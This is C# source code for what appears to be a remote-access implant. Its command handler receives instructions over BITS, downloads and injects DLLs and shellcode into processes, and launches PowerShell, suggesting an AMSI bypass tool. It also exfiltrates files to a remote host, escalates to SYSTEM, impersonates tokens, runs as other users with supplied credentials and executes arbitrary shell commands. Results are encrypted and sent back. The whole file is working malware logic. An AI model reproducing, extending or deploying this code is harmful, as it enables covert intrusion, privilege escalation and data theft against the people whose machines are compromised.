public static void Main(string method, string[] arguments, Assembly dll)
{
var obj = new LauncherDll();
var thr1 = new Thread(ExecuteDllInMemory);
var a = new object [] { method, arguments, dll };
thr1.Start(a);
}
private void DoSomething(Content file)
{
var rps = "";
try
{
switch (file.Commands[0])
{
case "inject_dll":
{
var fileP = _tempPath + @"\" + _id;
var headers = "reqId: " + _auth + "\r\ncontid: " + ContId;
if (_jobsManager.Get(_id, fileP, headers, BITS4.BG_JOB_PRIORITY.BG_JOB_PRIORITY_FOREGROUND))
{
try
{
var dll = LoadDll(fileP);
var method = file.Commands[1];
var args = "";
for (var i = 2; i < file.Commands.Length; i++)
{
args += file.Commands[i];
if (i < file.Commands.Length)
{
args += " ";
}
}
var arguments = new string[] { args };
LauncherDll.Main(method, arguments, dll);
rps = "Dll injected!";
}
catch (Exception)
{
rps = "ERR:Fatal error occurred while trying to inject the dll.\n";
}
}
else
{
rps = "ERR:Dll not found!\n";
}
break;
}
case "inject_shellcode":
{
var fileP = _tempPath + @"\" + _id;
var headers = "reqId: " + _auth + "\r\ncontid: " + ContId;
var pid = -1;
if (file.Commands.Length >= 2)
{
pid = int.Parse(file.Commands[1]);
}
if (_jobsManager.Get(_id, fileP, headers, BITS4.BG_JOB_PRIORITY.BG_JOB_PRIORITY_FOREGROUND))
{
byte[] sh;
GetEncryptedFileContent(fileP, out sh);
try
{
LauncherShellCode.Main(sh, _sysCall, pid);
rps = "Shellcode injected!\n";
}
catch (Exception)
{
rps = "ERR:Fatal error occurred while trying to inject shellCode.\n";
}
}
else
{
rps = "ERR:Shellcode file not found!\n";
}
break;
}
case "powershell":
{
rps = Utils.ExecuteCommand("powershell -V 2 /C Write-Host hi");
if (rps.Contains("hi"))
{
LauncherPowershell.Main(file.Commands[1], file.Commands[2]);
rps = "You should have your Powershell at " + file.Commands[1] + ":" + file.Commands[2] + "!\n";
}
else
{
rps = "Version 2 of Powershell not available. Try injecting EvilSalsa by CyberVaca in order to use powershell without am" + "si.\n";
}
break;
}
case "send":
{
var fileP = _tempPath + @"\" + _id;
var headers = "reqId: " + _auth + "\r\ncontid: " + ContId;
if (_jobsManager.Get(_id, fileP, headers, BITS4.BG_JOB_PRIORITY.BG_JOB_PRIORITY_FOREGROUND))
{
File.Copy(fileP, file.Commands[1], true);
rps = "Dowload finished.\n";
}
else
{
rps = "ERR:Download failed!\n";
}
break;
}
case "exfiltrate":
{
if (File.Exists(file.Commands[1]))
{
if (_jobsManager.Send(file.Commands[2], file.Commands[1]))
{
rps = "Exfiltration succeed.\n";
}
else
{
rps = "ERR:Exfiltration failed!\n";
}
}
else
{
rps = "ERR:File to exfiltrate not found!\n";
}
break;
}
case "getsystem":
{
if (Utils.IsHighIntegrity(_sysCall))
{
rps = TokenManager.GetSystem() ? "We are System!\n" : "ERR:Process failed! Is this process running with high integrity level?\n";
}
else
{
rps = "ERR:Process failed! Is this process running with high integrity level?\n";
}
break;
}
case "rev2self":
{
TokenManager.Rev2Self();
rps = "Welcome back.\n";
break;
}
case "runas":
{
string user = "", domain = "", password = "";
var userData = file.Commands[1].Split('\\');
if (userData.Length == 1)
{
domain = ".";
user = userData[0];
}
else
{
domain = userData[0];
user = userData[1];
}
password = file.Commands[2];
rps = TokenManager.RunAs(domain, user, password) ? "Success!" : "ERR:Invalid credentials.";
break;
}
case "list":
{
rps = GetProcessInfo();
break;
}
case "impersonate":
{
try
{
if (_tokenManager.Impersonate(int.Parse(file.Commands[1])))
{
rps = "Impersonation achieved!\n";
}
else
{
rps = "ERR: Not enough privileges!\n";
}
}
catch
{
rps = "ERR: Impersonation failed!\n";
}
break;
}
case "exit":
{
Environment.Exit(0);
break;
}
default:
{
rps = Utils.ExecuteCommand(file.Commands[0]);
break;
}
}
}
catch
{
rps = "ERR: Something went wrong!";
}
var response = new Response(rps, _auth);
var filePath = _tempPath + @"\" + _id + ".txt";
EncryptResponseIntoFile(filePath, response);
TrySend(filePath);
}
